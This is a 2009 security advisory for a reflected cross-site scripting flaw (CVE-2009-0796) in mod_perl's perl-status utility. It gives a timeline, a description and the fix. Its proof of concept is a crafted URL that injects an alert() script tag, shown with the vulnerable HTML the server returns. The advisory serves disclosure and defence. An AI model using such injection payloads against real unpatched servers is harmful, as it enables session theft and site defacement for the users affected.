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Vulnerabilities 2009


PR09-03 XSS with mod_perl perl_status utility


  • Advisory publicly released: Friday, 24 April 2009
  • Vulnerability found: Saturday, 28 February 2009
  • Vendor informed: Sunday, 1 March 2009
  • Vulnerability fixed: Wednesday, 15 April 2009
  • Severity level: Medium/High
  • Credits
    Richard Brain of ProCheckUp Ltd (www.procheckup.com).
  • Description
    There is a Cross-site Scripting vulnerability on Mod_perl's, perl-status utility. The perl-status utility on request displays the current status of the Mod_perl server, and some configuration information. Perl-status when configured to allow any viewers, presents an information disclosure risk,
    Procheckup has found by making a malformed request to perl-status, that additionally a vanilla cross site scripting (XSS) attack is possible.
  • Proof of concept
    Submitting the following string to an unpatched server "server".
    http://server:80/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E

    The following is returned:-
    <p><a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?env">Environment</a><br />
    <a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?inc">Loaded Modules</a><br />
    <a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?inh_tree">Inheritance Tree</a><br />
    <a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?isa_tree">ISA Tree</a><br />
    <a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?myconfig">Perl Configuration</a><br />
    <a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?rgysubs">Compiled Registry Scripts</a><br />
    <a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?script">PerlRequire'd Files</a><br />
    <a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?sig">Signal Handlers</a><br />
    <a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?symdump">Symbol Table Dump</a><br />
    </p></body></html>

    An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link or visits a malicious webpage. The malicious code would run in the security context of the vulnerable website.

    This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: passwords or session IDs) to unauthorised third parties.
  • How to fix
    Many thanks to Torsten Foertsch for his kind assistance in fixing the bug.
    http://perl.apache.org/
  • CVE reference
    CVE-2009-0796
  • BID
    34383
  • References

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